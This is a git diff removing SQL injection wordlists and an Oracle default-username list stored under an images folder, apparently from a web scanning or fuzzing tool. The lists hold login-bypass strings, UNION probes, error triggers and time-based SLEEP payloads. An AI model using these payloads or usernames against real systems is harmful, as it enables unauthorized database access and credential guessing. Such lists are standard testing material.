-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-error.txt b/src/images/sqli-error.txt
deleted file mode 100644
index 693ccdd13..000000000
--- a/src/images/sqli-error.txt
+++ /dev/null
@@ -1,40 +0,0 @@
-'asd
-')asd
-''asd
-'))asd
-`ads
-`)asd
-``asd
-`))asd
-,
-"asd
-")asd
-""asd
-"))asd
-/
-//
-\
-\\
-;ad
-%2527asd
-%2522asd
--- -
-#
-/*
-1
--1
-999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
--999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
-asd
-|
-&
-||
-&&
-@
-%
-;
->
-!"·$%&(=?¿'¡`<>);:_#-@
-SLEEP(5)
-SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/
-SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(5)))OR"*/ FROM some_table WHERE ex = ample
\ No newline at end of file
diff --git a/src/images/sqli-logic.txt b/src/images/sqli-logic.txt
deleted file mode 100644
index 6efb4fbff..000000000
--- a/src/images/sqli-logic.txt
+++ /dev/null
@@ -1,82 +0,0 @@
-true
-1
-1>0
-2-1
-0+1
-1*1
-1%2
-1 & 1
-1&1
-1 && 2
-1&&2
--1 || 1
--1||1
--1 oR 1=1
-1 aND 1=1
-(1)oR(1=1)
-(1)aND(1=1)
--1/**/oR/**/1=1
-1/**/aND/**/1=1
-1'
-1'>'0
-2'-'1
-0'+'1
-1'*'1
-1'%'2
-1'&'1'='1
-1'&&'2'='1
--1'||'1'='1
--1'oR'1'='1
-1'aND'1'='1
-1"
-1">"0
-2"-"1
-0"+"1
-1"*"1
-1"%"2
-1"&"1"="1
-1"&&"2"="1
--1"||"1"="1
--1"oR"1"="1
-1"aND"1"="1
-1`
-1`>`0
-2`-`1
-0`+`1
-1`*`1
-1`%`2
-1`&`1`=`1
-1`&&`2`=`1
--1`||`1`=`1
--1`oR`1`=`1
-1`aND`1`=`1
-1')>('0
-2')-('1
-0')+('1
-1')*('1
-1')%('2
-1')&'1'=('1
-1')&&'1'=('1
--1')||'1'=('1
--1')oR'1'=('1
-1')aND'1'=('1
-1")>("0
-2")-("1
-0")+("1
-1")*("1
-1")%("2
-1")&"1"=("1
-1")&&"1"=("1
--1")||"1"=("1
--1")oR"1"=("1
-1")aND"1"=("1
-1`)>(`0
-2`)-(`1
-0`)+(`1
-1`)*(`1
-1`)%(`2
-1`)&`1`=(`1
-1`)&&`1`=(`1
--1`)||`1`=(`1
--1`)oR`1`=(`1
-1`)aND`1`=(`1
diff --git a/src/images/sqli-true.txt b/src/images/sqli-true.txt
deleted file mode 100644
index d28f1dfac..000000000
--- a/src/images/sqli-true.txt
+++ /dev/null
@@ -1,421 +0,0 @@
-true
-'&'
-"&"
-'^'
-"^"
-'*'
-"*"
-0=0
-'='
-"="
-')&('
-")&("
-')^('
-")^("
-')*('
-")*("
-0)=(0
-')=('
-")=("
-'))&(('
-"))&(("
-'))^(('
-"))^(("
-'))*(('
-"))*(("
-0))=((0
-'))=(('
-"))=(("
-2'LIkE'3
-2"LIkE"3
--3')LIkE('3
--3")LIkE("3
--3'))LIkE(('3
--3"))LIkE(("3
--3 oR 2=2
--3' oR 2=2-- 2
--3' oR 2=2#
--3' oR 2=2/*
--3" oR 2=2-- 2
--3" oR 2=2#
--3" oR 2=2/*
--3 oR 2
--3' oR 2-- 2
--3' oR 2#
--3' oR 2/*
--3" oR 2-- 2
--3" oR 2#
--3" oR 2/*
--3 oR 2>0
--3' oR 2>0-- 2
--3' oR 2>0#
--3' oR 2>0/*
--3" oR 2>0-- 2
--3" oR 2>0#
--3" oR 2>0/*
--3 oR 0<2
--3' oR 0<2-- 2
--3' oR 0<2#
--3' oR 0<2/*
--3" oR 0<2-- 2
--3" oR 0<2#
--3" oR 0<2/*
--3 oR 2 LIkE 2
--3' oR 2 LIkE 2-- 2
--3' oR 2 LIkE 2#
--3' oR 2 LIkE 2/*
--3" oR 2 LIkE 2-- 2
--3" oR 2 LIkE 2#
--3" oR 2 LIkE 2/*
--3 oR '2'='2'
--3' oR 2 oR '
--3'oR'2'oR'
--3" oR 2 oR "
--3"oR"2"oR"
--3 oR true
--3' oR true-- 2
--3' oR true#
--3' oR true/*
--3" oR true-- 2
--3" oR true#
--3" oR true/*
--3'oR''+'2
--3"oR""+"2
--3'oR''-'-2
--3"oR""-"-2
--3'oR'2'&'2
--3"oR"2"&"2
--3'oR''^'2
--3"oR""^"2
--3'oR'2'*'2
--3"oR"2"*"2
--3'oR'2'>'0
--3"oR"0"<"2
--3'oR'2'='2
--3"oR"2"="2
--3/**/oR/**/2=2
--3'/**/oR/**/2=2#
--3'/**/oR/**/2=2/*
--3"/**/oR/**/2=2#
--3"/**/oR/**/2=2/*
--3/**/oR/**/2
--3'/**/oR/**/2#
--3'/**/oR/**/2/*
--3"/**/oR/**/2#
--3"/**/oR/**/2/*
--3/**/oR/**/2>0
--3'/**/oR/**/2>0#
--3'/**/oR/**/2>0/*
--3"/**/oR/**/2>0#
--3"/**/oR/**/2>0/*
--3/**/oR/**/0<2
--3'/**/oR/**/0<2#
--3'/**/oR/**/0<2/*
--3"/**/oR/**/0<2#
--3"/**/oR/**/0<2/*
--3/**/oR/**/2/**/LIkE/**/2
--3'/**/oR/**/2/**/LIkE/**/2#
--3'/**/oR/**/2/**/LIkE/**/2/*
--3"/**/oR/**/2/**/LIkE/**/2#
--3"/**/oR/**/2/**/LIkE/**/2/*
--3/**/oR/**/'2'='2'
--3'/**/oR/**/2/**/oR/**/'
--3"/**/oR/**/2/**/oR/**/"
--3/**/oR/**/true
--3'/**/oR/**/true#
--3'/**/oR/**/true/*
--3"/**/oR/**/true#
--3"/**/oR/**/true/*
--3||2=2
--3'||2=2-- 2
--3'||2=2#
--3'||2=2/*
--3"||2=2-- 2
--3"||2=2#
--3"||2=2/*
--3||2
--3'||2-- 2
--3'||2#
--3'||2/*
--3"||2-- 2
--3"||2#
--3"||2/*
--3||2>0
--3'||2>0-- 2
--3'||2>0#
--3'||2>0/*
--3"||2>0-- 2
--3"||2>0#
--3"||2>0/*
--3||0<2
--3'||0<2-- 2
--3'||0<2#
--3'||0<2/*
--3"||0<2-- 2
--3"||0<2#
--3"||0<2/*
--3||(2)LIkE(2)
--3'||(2)LIkE(2)-- 2
--3'||(2)LIkE(2)#
--3'||(2)LIkE(2)/*
--3"||(2)LIkE(2)-- 2
--3"||(2)LIkE(2)#
--3"||(2)LIkE(2)/*
--3||'2'='2'
--3'||'2'='2
--3"||"2"="2
--3'||2||'
--3'||'2'||'
--3"||2||"
--3"||"2"||"
--3||true
--3'||true-- 2
--3'||true#
--3'||true/*
--3"||true-- 2
--3"||true#
--3"||true/*
--3'||''+'2
--3"||""+"2
--3'||''-'-2
--3"||""-"-2
--3'||'2'&'2
--3"||"2"&"2
--3'||''^'2
--3"||""^"2
--3'||'2'*'2
--3"||"2"*"2
-(-3)oR(2)=(2)
--3'oR(2)=(2)#
--3'oR(2)=(2)/*
--3"oR(2)=(2)#
--3"oR(2)=(2)/*
-(-3)oR(2)
--3'oR(2)#
--3'oR(2)/*
--3"oR(2)#
--3"oR(2)/*
-(-3)oR(2)LIkE(2)
--3'oR(2)LIkE(2)#
--3'oR(2)LIkE(2)/*
--3"oR(2)LIkE(2)#
--3"oR(2)LIkE(2)/*
-(-3)oR'2'='2'
--3"oR"(2)"="(2)
--3'oR(2)oR'
--3"oR(2)oR"
-(-3)oR(true)
--3'oR(true)#
--3'oR(true)/*
--3"oR(true)#
--3"oR(true)/*
--3)oR(2)=(2
--3')oR(2)=2-- 2
--3')oR(2)=2#
--3')oR(2)=2/*
--3")oR(2)=2-- 2
--3")oR(2)=2#
--3")oR(2)=2/*
--3)oR(2
--3')oR(2)-- 2
--3')oR(2)#
--3')oR(2)/*
--3")oR(2)-- 2
--3")oR(2)#
--3")oR(2)/*
--3)oR(2)>(0
--3')oR(2)>0-- 2
--3')oR(2)>0#
--3')oR(2)>0/*
--3")oR(2)>0-- 2
--3")oR(2)>0#
--3")oR(2)>0/*
--3)oR(0)<(2
--3')oR(0)<2-- 2
--3')oR(0)<2#
--3')oR(0)<2/*
--3")oR(0)<2-- 2
--3")oR(0)<2#
--3")oR(0)<2/*
--3)oR(2)LIkE(2
--3')oR(2)LIkE(2)-- 2
--3')oR(2)LIkE(2)#
--3')oR(2)LIkE(2)/*
--3")oR(2)LIkE(2)-- 2
--3")oR(2)LIkE(2)#
--3")oR(2)LIkE(2)/*
--3)oR'2'=('2'
--3')oR'2'=('2
--3")oR"2"=("2
--3')oR(2)oR('
--3')oR'2'oR('
--3")oR(2)oR("
--3")oR"2"oR("
--3)oR(true
--3')oR(true)-- 2
--3')oR(true)#
--3')oR(true)/*
--3")oR(true)-- 2
--3")oR(true)#
--3")oR(true)/*
--3')oR''+('2
--3")oR""+("2
--3')oR''-('-2
--3")oR""-("-2
--3')oR'2'&('2
--3")oR"2"&("2
--3')oR''^('2
--3")oR""^("2
--3')oR'2'*('2
--3")oR"2"*("2
--3')/**/oR/**/2/**/oR/**/('
--3")/**/oR/**/2/**/oR/**/("
--3)||2=(2
--3')||2=2-- 2
--3')||2=2#
--3')||2=2/*
--3")||2=2-- 2
--3")||2=2#
--3")||2=2/*
--3)||(2
--3')||2-- 2
--3')||2#
--3')||2/*
--3")||2-- 2
--3")||2#
--3")||2/*
--3||(2)LIkE(2
--3')||(2)LIkE2-- 2
--3')||(2)LIkE2#
--3')||(2)LIkE2/*
--3")||(2)LIkE2-- 2
--3")||(2)LIkE2#
--3")||(2)LIkE2/*
--3)||'2'=('2'
--3')||'2'=('2
--3")||"2"=("2
--3')||2||('
--3')||'2'||('
--3")||2||("
--3")||"2"||("
--3)||(true
--3')||(true)-- 2
--3')||(true)#
--3')||(true)/*
--3")||(true)-- 2
--3")||(true)#
--3")||(true)/*
--3')||''+('2
--3")||""+("2
--3')||''-('-2
--3")||""-("-2
--3')||'2'&('2
--3")||"2"&("2
--3')||''^('2
--3")||""^("2
--3')||'2'*('2
--3")||"2"*("2
--3))oR(2)=((2
--3'))oR(2)=2-- 2
--3'))oR(2)=2#
--3'))oR(2)=2/*
--3"))oR(2)=2-- 2
--3"))oR(2)=2#
--3"))oR(2)=2/*
--3))oR((2
--3'))oR(2)-- 2
--3'))oR(2)#
--3'))oR(2)/*
--3"))oR(2)-- 2
--3"))oR(2)#
--3"))oR(2)/*
--3))oR(2)>((0
--3'))oR(2)>0-- 2
--3'))oR(2)>0#
--3'))oR(2)>0/*
--3"))oR(2)>0-- 2
--3"))oR(2)>0#
--3"))oR(2)>0/*
--3))oR(0)<((2
--3'))oR(0)<2-- 2
--3'))oR(0)<2#
--3'))oR(0)<2/*
--3"))oR(0)<2-- 2
--3"))oR(0)<2#
--3"))oR(0)<2/*
--3))oR(2)LIkE((2
--3'))oR(2)LIkE(2)-- 2
--3'))oR(2)LIkE(2)#
--3'))oR(2)LIkE(2)/*
--3"))oR(2)LIkE(2)-- 2
--3"))oR(2)LIkE(2)#
--3"))oR(2)LIkE(2)/*
--3))oR'2'=(('2'
--3'))oR'2'=(('2
--3"))oR"2"=(("2
--3'))oR(2)oR(('
--3'))oR'2'oR(('
--3"))oR(2)oR(("
--3"))oR"2"oR(("
--3))oR((true
--3'))oR(true)-- 2
--3'))oR(true)#
--3'))oR(true)/*
--3"))oR(true)-- 2
--3"))oR(true)#
--3"))oR(true)/*
--3'))oR''+(('2
--3"))oR""+(("2
--3'))oR''-(('-2
--3"))oR""-(("-2
--3'))oR'2'&(('2
--3"))oR"2"&(("2
--3'))oR''^(('2
--3"))oR""^(("2
--3'))oR'2'*(('2
--3"))oR"2"*(("2
--3))||2=((2
--3'))||2=2-- 2
--3'))||2=2#
--3'))||2=2/*
--3"))||2=2-- 2
--3"))||2=2#
--3"))||2=2/*
--3))||((2
--3'))||2-- 2
--3'))||2#
--3'))||2/*
--3"))||2-- 2
--3"))||2#
--3"))||2/*
--3||(2)LIkE((2
--3'))||(2)LIkE2-- 2
--3'))||(2)LIkE2#
--3'))||(2)LIkE2/*
--3"))||(2)LIkE2-- 2
--3"))||(2)LIkE2#
--3"))||(2)LIkE2/*
--3))||'2'=(('2'
--3'))||'2'=(('2
--3"))||"2"=(("2
--3'))||2||(('
--3'))||'2'||(('
--3"))||2||(("
--3"))||"2"||(("
--3))||((true
--3'))||(true)-- 2
--3'))||(true)#
--3'))||(true)/*
--3"))||(true)-- 2
--3"))||(true)#
--3"))||(true)/*
--3'))||''+(('2
--3"))||""+(("2
--3'))||''-(('-2
--3"))||""-(("-2
--3'))||'2'&(('2
--3"))||"2"&(("2
--3'))||''^(('2
--3"))||""^(("2
--3'))||'2'*(('2
--3"))||"2"*(("2
\ No newline at end of file
diff --git a/src/images/users-oracle.txt b/src/images/users-oracle.txt
deleted file mode 100644
index f95874bec..000000000
--- a/src/images/users-oracle.txt
+++ /dev/null
@@ -1,1369 +0,0 @@
-AASH
-ABA1
-abm
-ABM
-adams
-ADAMS
-adldemo
-ADLDEMO
-admin
-ADMIN
-administrator
-ADMINISTRATOR
-AD_MONITOR
-ADS
-ADSEUL_US
-ahl
-AHL
-ahm
-AHM
-ak
-AK
-AL
-ALA1
-alhro
-ALHRO
-alhrw
-ALHRW
-ALLUSERS
-alr
-ALR
-AMA1
-AMA2
-AMA3
-AMA4
-AMF
-ams
-AMS
-AMS1
-AMS2
-AMS3
-AMS4
-AMSYS
-amv
-AMV
-AMW
-andy
-ANDY
-ANNE
-anonymous
-ANONYMOUS
-AOLDEMO
-ap
-AP
-APA1
-APA2
-APA3
-APA4
-APPLEAD
-applmgr
-APPLMGR
-applsys
-APPLSYS
-applsyspub
-APPLSYSPUB
-applysyspub
-APPLYSYSPUB
-apps
-APPS
-apps_mrc
-APPS_MRC
-appuser
-APPUSER
-APS1
-APS2
-APS3
-APS4
-aq
-AQ
-aqdemo
-AQDEMO
-aqjava
-AQJAVA
-aquser
-AQUSER
-ar
-AR
-ARA1
-ARA2
-ARA3
-ARA4
-ARS1
-ARS2
-ARS3
-ARS4
-ART
-asf
-ASF
-asg
-ASG
-asl
-ASL
-ASN
-aso
-ASO
-asp
-ASP
-ast
-AST
-atm
-ATM
-AUC_GUEST
-audiouser
-AUDIOUSER
-aurora$jis$utility$
-AURORA$JIS$UTILITY$
-aurora$orb$unauthenticated
-AURORA$ORB$UNAUTHENTICATED
-AUTHORIA
-ax
-AX
-az
-AZ
-B2B
-BAM
-bc4j
-BC4J
-BCA1
-BCA2
-ben
-BEN
-bic
-BIC
-bil
-BIL
-bim
-BIM
-bis
-BIS
-biv
-BIV
-bix
-BIX
-blake
-BLAKE
-blewis
-BLEWIS
-BMEADOWS
-BNE
-bom
-BOM
-BP01
-BP02
-BP03
-BP04
-BP05
-BP06
-brio_admin
-BRIO_ADMIN
-brugernavn
-BRUGERNAVN
-brukernavn
-BRUKERNAVN
-bsc
-BSC
-bug_reports
-BUG_REPORTS
-BUYACCT
-BUYAPPR1
-BUYAPPR2
-BUYAPPR3
-BUYER
-BUYMTCH
-calvin
-CALVIN
-CAMRON
-CANDICE
-CARL
-CARLY
-CARMEN
-CARRIECONYERS
-CATADMIN
-catalog
-CATALOG
-cct
-CCT
-cdemo82
-CDEMO82
-cdemocor
-CDEMOCOR
-cdemorid
-CDEMORID
-cdemoucb
-CDEMOUCB
-cdouglas
-CDOUGLAS
-ce
-CE
-CEASAR
-centra
-CENTRA
-central
-CENTRAL
-CFD
-CHANDRA
-CHARLEY
-CHRISBAKER
-CHRISTIE
-cids
-CIDS
-CINDY
-cis
-CIS
-cisinfo
-CISINFO
-clark
-CLARK
-CLAUDE
-CLINT
-CLN
-cn
-CN
-CNCADMIN
-company
-COMPANY
-compiere
-COMPIERE
-CONNIE
-CONNOR
-CORY
-cqschemauser
-CQSCHEMAUSER
-cquserdbuser
-CQUSERDBUSER
-CRM1
-CRM2
-crp
-CRP
-CRPB733
-CRPCTL
-CRPDTA
-cs
-CS
-CSADMIN
-CSAPPR1
-csc
-CSC
-csd
-CSD
-CSDUMMY
-cse
-CSE
-csf
-CSF
-csi
-CSI
-csl
-CSL
-CSM
-csmig
-CSMIG
-csp
-CSP
-csr
-CSR
-css
-CSS
-ctxdemo
-CTXDEMO
-ctxsys
-CTXSYS
-CTXTEST
-cua
-CUA
-cue
-CUE
-cuf
-CUF
-cug
-CUG
-cui
-CUI
-cun
-CUN
-cup
-CUP
-cus
-CUS
-cz
-CZ
-data_schema
-DATA_SCHEMA
-DAVIDMORGAN
-dbi
-DBI
-dbsnmp
-DBSNMP
-dbvision
-DBVISION
-DCM
-DD7333
-DD7334
-DD810
-DD811
-DD812
-DD9
-DDB733
-DDD
-ddic
-DDIC
-demo
-DEMO
-demo8
-DEMO8
-demo9
-DEMO9
-des
-DES
-des2k
-DES2K
-dev2000_demos
-DEV2000_DEMOS
-DEVB733
-DEVUSER
-DGRAY
-diane
-DIANE
-dip
-DIP
-DISCOVERER5
-discoverer_admin
-DISCOVERER_ADMIN
-DKING
-DLD
-DMADMIN
-DMATS
-DMS
-dmsys
-DMSYS
-DOM
